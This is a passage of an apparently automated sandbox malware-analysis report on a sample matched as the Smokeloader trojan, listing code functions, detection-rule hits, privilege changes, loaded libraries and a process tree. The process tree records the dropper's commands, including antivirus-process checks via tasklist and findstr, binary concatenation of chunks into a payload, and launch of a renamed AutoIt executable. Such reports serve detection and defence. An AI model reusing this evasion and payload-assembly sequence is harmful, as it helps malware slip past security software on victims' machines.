        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B3F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00B3F20D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C3F0_2_00406C3F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0075801710_2_00758017
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0074E14410_2_0074E144
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0073E1F010_2_0073E1F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076A26E10_2_0076A26E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007522A210_2_007522A2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007322AD10_2_007322AD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0074C62410_2_0074C624
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076E87F10_2_0076E87F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007BC8A410_2_007BC8A4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A2A0510_2_007A2A05
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00766ADE10_2_00766ADE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00798BFF10_2_00798BFF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0074CD7A10_2_0074CD7A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0075CE1010_2_0075CE10
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0076715910_2_00767159
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0073924010_2_00739240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007C531110_2_007C5311
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007396E010_2_007396E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0075170410_2_00751704
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00751A7610_2_00751A76
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00739B6010_2_00739B60
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00757B8B10_2_00757B8B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00751D2010_2_00751D20
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00757DBA10_2_00757DBA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00751FE710_2_00751FE7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0075801716_2_00758017
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0073E1F016_2_0073E1F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0076A26E16_2_0076A26E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0073226D16_2_0073226D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007522A216_2_007522A2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0074C4B716_2_0074C4B7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0076E87F16_2_0076E87F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007BC8A416_2_007BC8A4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007A2A0516_2_007A2A05
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00766ADE16_2_00766ADE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00798BFF16_2_00798BFF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0075CE1016_2_0075CE10
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0076715916_2_00767159
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0073924016_2_00739240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007C531116_2_007C5311
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0073D38016_2_0073D380
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007396E016_2_007396E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0075170416_2_00751704
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00751A7616_2_00751A76
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00739B6016_2_00739B60
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00757B8B16_2_00757B8B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00751D2016_2_00751D20
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00757DBA16_2_00757DBA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00751FE716_2_00751FE7
        Source: C:\Windows\explorer.exeCode function: 17_2_031428D817_2_031428D8
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF801719_2_00AF8017
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00ADE1F019_2_00ADE1F0
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF22A219_2_00AF22A2
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AD226D19_2_00AD226D
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B0A26E19_2_00B0A26E
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AEC4B719_2_00AEC4B7
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B5C8A419_2_00B5C8A4
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B0E87F19_2_00B0E87F
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B06ADE19_2_00B06ADE
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B42A0519_2_00B42A05
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B38BFF19_2_00B38BFF
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AFCE1019_2_00AFCE10
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B0715919_2_00B07159
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AD924019_2_00AD9240
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B6531119_2_00B65311
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AD96E019_2_00AD96E0
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF170419_2_00AF1704
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF1A7619_2_00AF1A76
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF7B8B19_2_00AF7B8B
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AD9B6019_2_00AD9B60
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF7DBA19_2_00AF7DBA
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF1D2019_2_00AF1D20
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00AF1FE719_2_00AF1FE7
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ssjhrji 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: String function: 00AEFD52 appears 32 times
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: String function: 00AF0DA0 appears 46 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 0074FD52 appears 81 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 00737873 appears 34 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 00750DA0 appears 92 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 0073B329 appears 60 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 00754CD3 appears 62 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 0073BD98 appears 33 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 0075917B appears 36 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 00763319 appears 48 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 00754D98 appears 42 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: String function: 007722D0 appears 55 times
        Source: file.exeStatic PE information: invalid certificate
        Source: file.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeP vs file.exe
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@25/31@6/3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A41FA GetLastError,FormatMessageW,10_2_007A41FA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00792010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00792010
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00791A0B AdjustTokenPrivileges,CloseHandle,10_2_00791A0B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00792010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00792010
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_00791A0B AdjustTokenPrivileges,CloseHandle,16_2_00791A0B
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B32010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00B32010
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B31A0B AdjustTokenPrivileges,CloseHandle,19_2_00B31A0B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,10_2_0079DD87
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_007A3A0E
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\CubeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsxA353.tmpJump to behavior
        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exeReversingLabs: Detection: 18%
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "decentrisingadvertisementssuite" Appliance
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Annually + Protective 1151\b
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1151\Existence.pif 1151\b
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ssjhrji C:\Users\user\AppData\Roaming\ssjhrji
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "decentrisingadvertisementssuite" Appliance Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Annually + Protective 1151\bJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1151\Existence.pif 1151\bJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifSection loaded: rasadhlp.dllJump to behavior
